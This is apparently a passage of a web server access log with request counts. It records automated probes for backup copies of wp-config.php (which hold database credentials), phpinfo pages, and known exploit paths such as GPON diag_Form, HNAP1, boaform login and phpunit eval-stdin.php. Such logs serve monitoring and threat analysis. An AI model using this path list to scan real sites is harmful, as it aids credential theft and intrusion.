6	GET	`/wp-config.php.pas`	HTTP/1.1
6	GET	`/wp-config.php.sav`	HTTP/1.1
6	GET	`/wp-config.php.save`	HTTP/1.1
6	GET	`/wp-config.php.saved`	HTTP/1.1
6	GET	`/wp-config.php.tar.gz`	HTTP/1.1
6	GET	`/wp-config.php.tar`	HTTP/1.1
6	GET	`/wp-config.php.temp`	HTTP/1.1
6	GET	`/wp-config.php.test`	HTTP/1.1
6	GET	`/wp-config.php.tgz`	HTTP/1.1
6	GET	`/wp-config.php.tmp`	HTTP/1.1
6	GET	`/wp-config.php.txt`	HTTP/1.1
6	GET	`/wp-config.php.war`	HTTP/1.1
6	GET	`/wp-config.php.zip`	HTTP/1.1
6	GET	`/wp-config.php~`	HTTP/1.1
6	GET	`/wp-config.sav`	HTTP/1.1
6	GET	`/wp/wp-config..php.back`	HTTP/1.1
6	GET	`/wp/wp-config.php-backup`	HTTP/1.1
6	GET	`/wp/wp-config.php.backup`	HTTP/1.1
6	GET	`/wp/wp-config.php.bak`	HTTP/1.1
6	GET	`/wp/wp-config.php.bakup`	HTTP/1.1
6	GET	`/wp/wp-config.php.bck`	HTTP/1.1
6	GET	`/wp/wp-config.php.conf`	HTTP/1.1
6	GET	`/wp/wp-config.php.copy`	HTTP/1.1
6	GET	`/wp/wp-config.php.core`	HTTP/1.1
6	GET	`/wp/wp-config.php.dat`	HTTP/1.1
6	GET	`/wp/wp-config.php.db`	HTTP/1.1
6	GET	`/wp/wp-config.php.default`	HTTP/1.1
6	GET	`/wp/wp-config.php.ini`	HTTP/1.1
6	GET	`/wp/wp-config.php.jar`	HTTP/1.1
6	GET	`/wp/wp-config.php.old`	HTTP/1.1
12	GET	`/wp/wp-config.php.orig`	HTTP/1.1
6	GET	`/wp/wp-config.php.pas`	HTTP/1.1
6	GET	`/wp/wp-config.php.sav`	HTTP/1.1
6	GET	`/wp/wp-config.php.save`	HTTP/1.1
6	GET	`/wp/wp-config.php.saved`	HTTP/1.1
6	GET	`/wp/wp-config.php.tar.gz`	HTTP/1.1
6	GET	`/wp/wp-config.php.tar`	HTTP/1.1
6	GET	`/wp/wp-config.php.temp`	HTTP/1.1
6	GET	`/wp/wp-config.php.test`	HTTP/1.1
6	GET	`/wp/wp-config.php.tgz`	HTTP/1.1
6	GET	`/wp/wp-config.php.tmp`	HTTP/1.1
6	GET	`/wp/wp-config.php.txt`	HTTP/1.1
6	GET	`/wp/wp-config.php.war`	HTTP/1.1
6	GET	`/wp/wp-config.php.zip`	HTTP/1.1
6	GET	`/wp/wp-config.php~`	HTTP/1.1
6	GET	`/wp/wp-config.sav`	HTTP/1.1
6	GET	`/xampp/_profiler/phpinfo`	HTTP/1.1
6	GET	`/xampp/info.php`	HTTP/1.1
6	GET	`/xampp/phpinfo.php`	HTTP/1.1
1	GET	`http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
9	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0